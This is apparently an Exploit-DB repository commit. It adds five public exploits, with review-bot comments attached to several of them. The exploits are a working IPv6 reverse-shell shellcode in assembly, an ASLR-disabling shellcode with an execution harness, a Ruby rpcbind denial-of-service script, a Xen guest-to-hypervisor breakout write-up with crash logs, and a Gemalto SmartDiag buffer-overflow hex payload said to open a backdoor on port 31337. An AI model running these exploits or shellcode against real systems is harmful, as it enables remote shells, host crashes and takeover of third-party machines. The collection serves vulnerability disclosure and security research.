DB: 2017-05-09

5 new exploits

RPCBind / libtirpc - Denial of Service
Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)
Xen 64bit PV Guest - pagetable use-after-type-change Breakout
Linux/x86 - Disable ASLR Shellcode (80 bytes)
Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)
Offensive Security 2017-05-09 04:46:38 +00:00
parent 64159294a8
commit 6f37b94a66
6 changed files with 532 additions and 0 deletions


@ -5484,6 +5484,7 @@ id,file,description,date,author,platform,type,port
41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0
41957,platforms/windows/dos/41957.html,"Microsoft Internet Explorer 11 - 'CMarkup::DestroySplayTree' Use-After-Free",2017-05-03,"Marcin Ressel",windows,dos,0
41965,platforms/java/dos/41965.txt,"CloudBees Jenkins 2.32.1 - Java Deserialization",2017-05-05,SecuriTeam,java,dos,0
41974,platforms/linux/dos/41974.rb,"RPCBind / libtirpc - Denial of Service",2017-05-08,"Guido Vranken",linux,dos,111
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -8970,6 +8971,8 @@ id,file,description,date,author,platform,type,port
41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0
41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -16119,6 +16122,8 @@ id,file,description,date,author,platform,type,port
41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0
41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0
41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egg-hunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0
41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0
41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse Shell Shellcode (IPv6) (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0


@ -0,0 +1,115 @@
[BITS 64]
; **reverse ip6 tcp shell
; * size >= 113 bytes (depends of ip addr, default is ::1)
; * nullbytes free (depends only on ip addr,
; you could always and the ip add to remove
; the nulls like i did with the port)
; * it sleeps and then tries to recconect (default 3 seconds)
;
;shell =
;"\x6a\x0a\x5f\x6a\x01\x5e\x48\x31\xd2\x6a\x29\x58\x0f\x05\x50\x5b"
;"\x52\x48\xb9\x00\x00\x00\x00\x00\x00\x01\x51\xb9\x00\x00\x00\x00"
;"\x51\xba\xff\xff\x05\xc0\x66\x21\xfa\x52\x48\x31\xf6\x56\x6a\x03"
;"\x54\x5f\x6a\x23\x58\x0f\x05\x59\x59\x53\x5f\x54\x5e\x6a\x1c\x5a"
;"\x6a\x2a\x58\x0f\x05\x48\x85\xc0\x75\xe0\x48\x96\x6a\x03\x5e\x6a"
;"\x21\x58\x48\xff\xce\x0f\x05\x75\xf6\x48\xbf\x2f\x2f\x62\x69\x2f"
;"\x73\x68\x56\x57\x48\x31\xd2\x54\x5f\x6a\x3b\x58\x0f\x05"
;
; again, the nulls propably won't even come up with your global ip addr
; if they do, and you don't encodee the payload, you could do some
; bitwise operations
;
; made by srakai (github.com/Srakai)
AF_INET6 equ 10
SOCK_STREAM equ 1
SOCKET equ 41
CONNECT equ 42
DUP2 equ 33
EXECVE equ 59
NANOSLEEP equ 35
section .text
global _start
_start:
; socket()
push AF_INET6
pop rdi
push SOCK_STREAM
pop rsi
xor rdx, rdx
push SOCKET
pop rax
syscall
push rax
pop rbx
; create struct sockaddr_in6
push rdx ;scope id = 0
mov rcx, 0x0100000000000000 ;sin6_addr for local link use:
push rcx ;sin6_addr 0x0100000000000000
mov rcx, 0x0000000000000000 ;sin6_addr 0x0000000000000000
push rcx ;sin6_addr
mov edx, 0xc005FFFF ;sin6_flowinfo=0 , family=AF_INET6, port=1472
and dx, di ;to change port change P, 0xPPPP000A
push rdx
sleep:
xor rsi, rsi
; struct timespec
push rsi ;push 0
push 3 ;seconds to sleep
; nanosleep()
push rsp
pop rdi
push NANOSLEEP
pop rax
syscall
pop rcx ;clear stack
pop rcx
; connect()
push rbx
pop rdi
push rsp
pop rsi
push 28 ;sizeof struct
pop rdx
push CONNECT
pop rax
syscall
test rax, rax ;if (rax&rax) ==0
jnz sleep
; dup2()
xchg rsi, rax ;rsi=0
push 3
pop rsi
dup2:
push DUP2
pop rax
dec rsi
syscall
jnz dup2
; execve()
mov rdi, 0x68732f6e69622f2f
push rsi
push rdi
xor rdx, rdx
push rsp
pop rdi
push EXECVE
pop rax
syscall
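Review bot: The header comment covers size and null-byte caveats but never states what the code does at run time, which is the first thing a reader triaging this sample needs. From the visible instructions it creates an AF_INET6 stream socket, loops on a 3-second nanosleep followed by connect() to ::1 port 1472 until connect returns 0, then dup2()s fds 2, 1 and 0 onto the socket and execve()s `//bin/sh`. A one-line summary such as `; behaviour: retries an outbound IPv6 TCP connect every 3 s, then binds stdio to the socket and execs //bin/sh` would expose that network and process footprint without tracing the stack pushes. The inline comment `sin6_addr for local link use:` mislabels the default address, which is the loopback ::1 as the header says, not a link-local one. The comment on `and dx, di` should also say that the mask depends on rdi still holding AF_INET6 from the socket() setup.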


@ -0,0 +1,67 @@
/*
Linux/x86
setuid-disable-aslr.c by @abatchy17 - abatchy.com
Shellcode size: 80 bytes
SLAE-885
section .text
global _start
_start:
;
; setruid(0,0)
;
xor ecx,ecx
mov ebx,ecx
push 0x46
pop eax
int 0x80
;
; open("/proc/sys/kernel/randomize_va_spaceX", O_RDWR)
;
xor eax,eax ; EAX = 0
jmp aslr_file
shellcode:
pop ebx ; EBX now points to '/proc/sys/kernel/randomize_va_space'
mov byte [ebx + 35],al
push byte 5
pop eax
push byte 2
pop ecx
int 80h
;
; write(fd, '0', 1)
;
xchg eax, ebx ; One byte less than mov ebx, eax
push byte 4
pop eax
xchg ecx, edx ; ECX already contains 2
dec edx
push byte 0x30
mov ecx, esp ; ECX now points to "0"
int 80h ; EAX will now contains 1
;
; exit(0)
;
int 80h ; Yep, that's it
aslr_file:
call shellcode ; Skips the filename and avoids using JMP
db '/proc/sys/kernel/randomize_va_space'
*/
#include <stdio.h>
#include <string.h>
unsigned char sc[] = "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x31\xc0\xeb\x1b\x5b\x88\x43\x23\x6a\x05\x58\x6a\x02\x59\xcd\x80\x93\x6a\x04\x58\x87\xca\x4a\x6a\x30\x89\xe1\xcd\x80\xcd\x80\xe8\xe0\xff\xff\xff\x2f\x70\x72\x6f\x63\x2f\x73\x79\x73\x2f\x6b\x65\x72\x6e\x65\x6c\x2f\x72\x61\x6e\x64\x6f\x6d\x69\x7a\x65\x5f\x76\x61\x5f\x73\x70\x61\x63\x65";
int main()
{
printf("Shellcode size: %d\n", strlen(sc));
int (*ret)() = (int(*)())sc;
ret();
}
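Review bot: The harness line `printf("Shellcode size: %d\n", strlen(sc));` passes a `size_t` to `%d` and an `unsigned char *` to `strlen`, so the format specifier and the pointer type are both mismatched; `printf("Shellcode size: %zu\n", strlen((const char *)sc));` is the correct form. In the embedded listing, `setruid(0,0)` should read `setreuid(0,0)` (syscall 0x46). The `exit(0)` label is also inaccurate: the final `int 80h` runs with ebx still holding the descriptor returned by open, so the exit status is that descriptor rather than 0. The block comment should state the effect plainly as well, e.g. `writes '0' to /proc/sys/kernel/randomize_va_space, turning ASLR off for newly started processes until the value is restored`, since that file write is what host monitoring would key on.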

89
platforms/linux/dos/41974.rb Executable file

@ -0,0 +1,89 @@
#!/usr/bin/ruby
#
# Source: https://raw.githubusercontent.com/guidovranken/rpcbomb/fe53048af2d4fb78c911e71a30f21afcffbbf5e1/rpcbomb.rb
#
# By Guido Vranken https://guidovranken.wordpress.com/
# Thanks to Sean Verity for writing an exploit in Ruby for an earlier
# vulnerability: https://www.exploit-db.com/exploits/26887/
# I've used it as a template.
require 'socket'
def usage
abort "\nusage: ./rpcbomb.rb <target> <# bytes to allocate> [port]\n\n"
end
bomb = """
` + # ,
: @ @ @ @ @ @
@ @ ; . + @ @ @ . @ @
@ @ @ @ @ ` @ @
. ` @ #
; @ @ @ . : @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ ;
@ @ @ @ @ @ @ @ @ @ @ @ @ `
@ @ @ @ @ @ @ @ @ @ @ @ @ @ :
# @ @ @ @ @ @ @ @ @ @ @ @ @ '
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
. @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
+ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
+ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
: @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ ,
@ @ @ @ @ @ @ @ @ @ @ @ @
, @ @ @ @ @ @ @ @ @ @ @
` @ @ @ @ @ @ @ @ @
, @ @ @ @ @
r p c b o m b
DoS exploit for *nix rpcbind/libtirpc.
(c) 2017 Guido Vranken.
https://guidovranken.wordpress.com/
"""
puts bomb
if ARGV.length >= 2
begin
host = ARGV[0]
numBytes = Integer(ARGV[1])
port = ARGV.length == 3 ? Integer(ARGV[2]) : 111
rescue
usage
end
pkt = [0].pack('N') # xid
pkt << [0].pack('N') # message type CALL
pkt << [2].pack('N') # RPC version 2
pkt << [100000].pack('N') # Program
pkt << [4].pack('N') # Program version
pkt << [9].pack('N') # Procedure
pkt << [0].pack('N') # Credentials AUTH_NULL
pkt << [0].pack('N') # Credentials length 0
pkt << [0].pack('N') # Credentials AUTH_NULL
pkt << [0].pack('N') # Credentials length 0
pkt << [0].pack('N') # Program: 0
pkt << [0].pack('N') # Ver
pkt << [4].pack('N') # Proc
pkt << [4].pack('N') # Argument length
pkt << [numBytes].pack('N') # Payload
s = UDPSocket.new
s.send(pkt, 0, host, port)
sleep 1.5
begin
s.recvfrom_nonblock(9000)
rescue
puts "No response from server received."
exit()
end
puts "Allocated #{numBytes} bytes at host #{host}:#{port}.\n" +
"\nDamn it feels good to be a gangster.\n\n"
else
usage
end
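Review bot: The closing message `Allocated #{numBytes} bytes at host ...` is printed for any datagram that arrives, because the result of `s.recvfrom_nonblock(9000)` is discarded and never compared with the request (the xid is a constant 0, so it could not be matched anyway). Anyone running this to check whether an rpcbind host is still affected would see the same output from a server that answers with an RPC error, which is presumably what a fixed build does. I would keep the reply and report it neutrally, e.g. `reply, = s.recvfrom_nonblock(9000)` followed by `puts "Reply of #{reply.bytesize} bytes from #{host}:#{port}; allocation not verified."`. The bare `rescue` around the receive also turns every exception, not only the would-block case, into "No response from server received."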

145
platforms/linux/local/41973.txt Executable file

@ -0,0 +1,145 @@
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1231
This is a bug in Xen that permits an attacker with control over the
kernel of a 64bit X86 PV guest to write arbitrary entries into a live
top-level pagetable.
To prevent PV guests from doing things like mapping live pagetables as
writable, Xen assigns types to physical pages and tracks type-specific
references with a reference counter ("type count", stored in the low
bits of page->u.inuse.type_info).
64-bit PV guests have multiple places in which the addresses of
top-level pagetables are stored:
arch.guest_table_user and arch.guest_table in the vcpu struct point to
the pagetables the guest has designated as user-mode top-level
pagetable and kernel-mode top-level pagetable. Both of these fields
take a type-specific reference on the pagetable to prevent the guest
from mapping it as writable.
arch.cr3 in the vcpu struct points to the current top-level pagetable
of the vCPU. While the vCPU is scheduled, arch.cr3 is the same as the
physical CPU's CR3.
arch.cr3 does not take an extra type-specific reference; it borrows
the reference from either arch.guest_table_user or arch.guest_table.
This means that whenever the field from which the reference is
borrowed is updated, arch.cr3 (together with the physical CR3) must be
updated as well.
The guest can update arch.guest_table_user and arch.guest_table using
__HYPERVISOR_mmuext_op with commands
MMUEXT_NEW_USER_BASEPTR (for arch.guest_table_user) and
MMUEXT_NEW_BASEPTR (for arch.guest_table). The handlers for these
commands assume that when the hypercall is executed, arch.cr3 always
equals arch.guest_table: The MMUEXT_NEW_BASEPTR handler updates
arch.cr3 to the new arch.guest_table, the MMUEXT_NEW_USER_BASEPTR
handler doesn't touch arch.cr3.
Hypercalls can only be executed from kernel context, so on hypercall
entry, arch.cr3==arch.guest_table is indeed true. However, using the
__HYPERVISOR_multicall hypercall, it is possible to execute the
__HYPERVISOR_iret hypercall, which can switch the pagetables to user
context, immediately followed by the __HYPERVISOR_mmuext_op hypercall
before actually entering guest user context.
This can be exploited from guest kernel context roughly as follows:
- copy all entries from the top-level kernel pagetable over the
top-level user pagetable (to make it possible for a post-iret
hypercall to access guest kernel memory)
- allocate a new page to be used later as top-level user pagetable,
copy the contents of the current top-level user pagetable into it,
remap it as readonly and pin it as a top-level pagetable
- perform the following operations in a single multicall:
- switch to user context using __HYPERVISOR_iret
- change arch.guest_table_user to the new top-level user pagetable
using __HYPERVISOR_mmuext_op with command MMUEXT_NEW_USER_BASEPTR
- unpin the old top-level user pagetable
- map the old top-level user pagetable as writable
- write crafted entries into the old top-level user pagetable
I have attached a proof of concept that corrupts the top-level
pagetable entry that maps the hypervisor text, causing a host
triplefault. I have tested the proof of concept in the following
configurations:
configuration 1:
running inside VMware Workstation
Xen version "Xen version 4.6.0 (Ubuntu 4.6.0-1ubuntu4.3)"
dom0: Ubuntu 16.04.2, Linux 4.8.0-41-generic #44~16.04.1-Ubuntu
unprivileged guest: Ubuntu 16.04.2, Linux 4.4.0-66-generic #87-Ubuntu
configuration 2:
running on a physical machine with Qubes OS 3.2 installed
Xen version 4.6.4
Compile the PoC with ./compile.sh, then run ./attack as root.
PoC Filename: xen_ptuaf.tar
################################################################################
Here's an exploit that causes the hypervisor to execute shellcode that then deliberately causes a hypervisor GPF by calling a noncanonical address. Usage:
root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./compile.sh
make: Entering directory '/usr/src/linux-headers-4.4.0-66-generic'
LD /root/xen_ptuaf_hv_shellcode_exec/built-in.o
CC [M] /root/xen_ptuaf_hv_shellcode_exec/module.o
nasm -f elf64 -o /root/xen_ptuaf_hv_shellcode_exec/native.o /root/xen_ptuaf_hv_shellcode_exec/native.asm
LD [M] /root/xen_ptuaf_hv_shellcode_exec/test.o
Building modules, stage 2.
MODPOST 1 modules
WARNING: could not find /root/xen_ptuaf_hv_shellcode_exec/.native.o.cmd for /root/xen_ptuaf_hv_shellcode_exec/native.o
CC /root/xen_ptuaf_hv_shellcode_exec/test.mod.o
LD [M] /root/xen_ptuaf_hv_shellcode_exec/test.ko
make: Leaving directory '/usr/src/linux-headers-4.4.0-66-generic'
root@pv-guest:~/xen_ptuaf_hv_shellcode_exec# ./attack
kernel CR3: 0xaa2dd000
L1 self-mapping is up, should have reliable pagetable control now
virt_to_pte(0x7f5bd439a000)
[ rest of output missing because of VM crash ]
Serial output:
(XEN) ----[ Xen-4.6.0 x86_64 debug=n Tainted: C ]----
(XEN) CPU: 2
(XEN) RIP: e008:[<00007f5bd439a03f>] 00007f5bd439a03f
(XEN) RFLAGS: 0000000000010246 CONTEXT: hypervisor (d1v2)
(XEN) rax: 1337133713371337 rbx: 1337133713371337 rcx: 1337133713371337
(XEN) rdx: 1337133713371337 rsi: 00007ffe98b5e248 rdi: 0000600000003850
(XEN) rbp: 1337133713371337 rsp: ffff8301abb37f30 r8: 0000000000000000
(XEN) r9: 000000000000001b r10: 0000000000000000 r11: 0000000000000202
(XEN) r12: 0000000080000000 r13: ffff8800026dd000 r14: ffff880003453c88
(XEN) r15: 0000000000000007 cr0: 0000000080050033 cr4: 00000000001506a0
(XEN) cr3: 00000000aa2dc000 cr2: ffff88007cfb2e98
(XEN) ds: 0000 es: 0000 fs: 0000 gs: 0000 ss: 0000 cs: e008
(XEN) Xen stack trace from rsp=ffff8301abb37f30:
(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN) 1337133713371337 1337133713371337 1337133713371337 1337133713371337
(XEN) 1337133713371337 0000000000401556 000000000000e033 0000000000000246
(XEN) 00007ffe98b5e208 000000000000e02b 0000000000000000 0000000000000000
(XEN) 0000000000000000 0000000000000000 0000000000000002 ffff830088c9c000
(XEN) 000000312b835580 0000000000000000
(XEN) Xen call trace:
(XEN) [<00007f5bd439a03f>] 00007f5bd439a03f
(XEN)
(XEN)
(XEN) ****************************************
(XEN) Panic on CPU 2:
(XEN) GENERAL PROTECTION FAULT
(XEN) [error_code=0000]
(XEN) ****************************************
(XEN)
(XEN) Reboot in five seconds...
PoC Filename: xen_ptuaf_hv_shellcode_exec.tar
Proofs of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41973.zip

111
platforms/windows/local/41972.txt Executable file

@ -0,0 +1,111 @@
# Exploit Title: Gemalto SmartDiag Diagnosis Tool <= v2.5 - Buffer Overflow
- SEH Overwrite
# Date: 16-03-2017
# Software Link: http://support.gemalto.com/index.php?id=download_tools
# Exploit Author: Majid Alqabandi
# Contact: https://www.linkedin.com/in/majidalqabandi/
# CVE: CVE-2017-6953
# Category: Local - command execution - Buffer Overflow - SEH Overwrite.
1. Description
SymDiag.exe is vulnerable to buffer overflow, SEH overwrite.
When trying to (Register a new card), Input fields are vulnerable to stack
overflow attack which leads to code execution and other possible security
threats.
2. Proof of Concept
The following PoC is provided code will:
- Exploit the vulnerability.
- Execute shell code.
- Create a backdoor on port 31337.
To exploit, start SmartDiag.exe tool, choose "Register a new card", on the
ATR use the following payload (Tested on Win7x64 & Win8x64 - SmartDiag
v2.5):
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
528340005283400052834000528340005283400052834000528340005283
400052834000528340005283400052834000528340005283400052834000
52834000528340005283400052834000572b0410477f40008c214100f494
400041ed40003b4140003552011078ab0110010000009cf2021000100000
328b031040000000d02203100120400026e6400090909090e2f500109090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909090909090
9090909090909090ddc1d97424f4bbc4aa698a5833c9b15683e8fc315814
0358d0489c7630055f87c076e962f1a48de7a378c5aa4ff28b5ec4760450
6d3c725f6ef0ba33ac92464ee0747681f575bffcf524688aa7d81dce7bd8
f144c3a2749ab71876cb671630f30c70e102c162dd4d6e50954fa6a8567e
8667694e0b79ad69f30cc5898e161ef3549283531f046065ccd3e369b990
ac6d3c74c78ab57b081b8d5f8c4756c1952d39fec68ae65a8c39f3ddcf55
30d0efa55e638397c1df0b948af9ccdba1be432249bf4ae11defe4c01d64
f5edc82ba541a28b152212647cad4d947f67f892b153a974b06337ec3d85
adfe6b1d593d4896fe3eba8a57a9f2c46fd602c3dc7baa8496976fb4a9bd
c7bf92569dd151c6a2fb016b3060d1e2293f86a39c36425e86e070a35eca
3078a3d5b90d9ff1a9cb20be9d8376684b6221da253c9eb4a1b9ec06b7c5
38f15777954468b8714111a4e1aec86c11e550c4baa00154a752fc9bded0
f46325c87d61614e6e1bfa3b9088fb69AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
3. Solution:
Vendor has been informed and confirmed the issue, no fix is available yet
from vendor.